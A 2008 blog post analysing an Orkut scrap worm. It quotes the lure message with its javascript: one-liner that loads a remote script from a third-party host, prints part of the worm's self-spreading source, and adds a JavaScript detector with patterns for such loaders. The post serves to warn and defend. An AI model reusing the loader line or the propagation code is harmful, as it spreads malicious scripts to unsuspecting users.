8 Feb 2008

Orkut scripts exposed

I generally do not check out the scripts sent to me in scraps by friends. But this was one script which kept coming to me from different directions, from many different friends who don't know each other. So I thought it must be something worth trying, or maybe it's spam. So I took a chance and tried it out, to my utter amazement. The script did not have any effect on my browser, and that's what made me feel nervous, wondering whether it had blown any security policies or exploited any vulnerabilities etc. So I made a search on it and found that the scraps were not only on my scrapbook but on those of all the friends on my list. So I decided to uncover what this script does behind the scenes.

JavaScript files can be nasty pieces of code which perform a particular function depending on what they were written for. It's really worth watching out for scripts on Orkut, as you never know if a script could land you in jail under the IT Act for spreading Trojans or viruses. These scripts can run from the address bar of the browser. When you enter a script in the address bar and press Enter, the script directs you to another site or link, or performs some function on the page. These scripts can also be injected into the server directly. This is called a Server Side Include (SSI) attack and injects the piece of script directly into the server. This is generally done on guestbooks, feedback forms etc. of a website which post messages directly to the server.

Here's the scrap:
Here are some cool pic..BY JINESH JAIN.. Just copy the JavaScript, paste it in your address bar and PRESS ENTER
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://tricks80.googlepages.com/20885.user.js';void(0)
trust me, you'll find this pic funny!


The javascript source code:
function SendScrapToAll()
{
    var scrapText;
    scrapText = "[blue]Here are some cool pic..BY [green]JINESH JAIN[/green].. [blue]Just copy the JavaScript, paste it in your address bar and PRESS ENTER[/blue]" +
        ""+
        "[orange]javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://tricks80.googlepages.com/20885.user.js';void(0)[/orange]"+
        ""+
        "[red]trust me, you'll find thispic funny! [:)] ";
    if(c == select.length)
        return;
    try{
        if(select[c].value!="")
        {
            sendScrap(select[c].value,scrapText);
        }
    }catch(e){
        //Suppressed Exception
    } finally {
        c = c+ 1;
        setTimeout("SendScrapToAll()", 666);
    }
}

What does the script do?
The script fetches the currently logged-on user's friends list from the Compose.aspx page, builds AJAX-based web requests and posts the scrap message to everyone on that list. And if you have more than 150 friends, sending more than 150 messages at a time will look like spamming to the Orkut admins, and you might even be blocked from accessing your Orkut account for some time.

Prevention is better than cure
There is no definite cure for such script injection, but you can delete each scrap individually.
Inform your friends about this script, and never try such scripts in future, however tempting they may be.
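
A defender-side check for scraps like the one quoted above, as an added example that is not part of the original post or of the worm's code: it strips Orkut's colour markup and flags text that combines a javascript: URI with a dynamically created script tag whose src points at a remote host. The indicator names, the verdict labels and the benign sample are assumptions of this example.

```javascript
// Added example, not code from the post. Indicator names are this example's own.

// Orkut-style markup such as [blue]...[/blue] and emoticons such as [:)].
// Stripped first so markup placed inside a keyword cannot hide it.
const MARKUP = /\[\/?[a-z]+\]|\[:[^\]]{1,3}\]/gi;

const INDICATORS = [
  { name: "javascript-uri", re: /javascript\s*:/i },
  { name: "creates-script-tag", re: /createElement\s*\(\s*['"]script['"]\s*\)/i },
  { name: "sets-remote-src", re: /\.src\s*=\s*['"]https?:\/\//i },
  { name: "dom-append", re: /\.appendChild\s*\(/i },
  { name: "address-bar-lure", re: /paste\b[^.]{0,40}\baddress\s*bar/i },
];

function analyzeScrap(raw) {
  const text = raw.replace(MARKUP, "");
  const hits = INDICATORS.filter((i) => i.re.test(text)).map((i) => i.name);
  // Hosts that the pasted code would load a script from.
  const hosts = [];
  for (const m of text.matchAll(/\.src\s*=\s*['"](https?:\/\/[^'"\s]+)['"]/gi)) {
    try {
      hosts.push(new URL(m[1]).hostname);
    } catch (_) {
      // Malformed URL: the indicator still counts, the host is skipped.
    }
  }

  const has = (n) => hits.includes(n);
  let verdict = "clean";
  if (has("javascript-uri") && has("creates-script-tag") && has("sets-remote-src")) {
    verdict = "remote-script-loader";
  } else if (has("javascript-uri") || has("address-bar-lure")) {
    verdict = "suspicious";
  }
  return { verdict, hits, hosts };
}

// The scrap quoted in the post, with the colour markup from the script source.
const WORM_SCRAP =
  "[blue]Here are some cool pic..BY [green]JINESH JAIN[/green].. " +
  "[blue]Just copy the JavaScript, paste it in your address bar and PRESS ENTER[/blue]" +
  "[orange]javascript:d=document;c=d.createElement('script');d.body.appendChild(c);" +
  "c.src='http://tricks80.googlepages.com/20885.user.js';void(0)[/orange]" +
  "[red]trust me, you'll find thispic funny! [:)] ";

// Constructed benign scrap for comparison.
const BENIGN_SCRAP = "[green]Happy birthday![/green] I wrote some javascript today [:)]";
console.log(analyzeScrap(WORM_SCRAP), analyzeScrap(BENIGN_SCRAP));
```

The host list it returns is the part worth passing on when you warn friends or report the scrap.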

Courtesy:
Coolwayfarer's Diary
Code Maverick
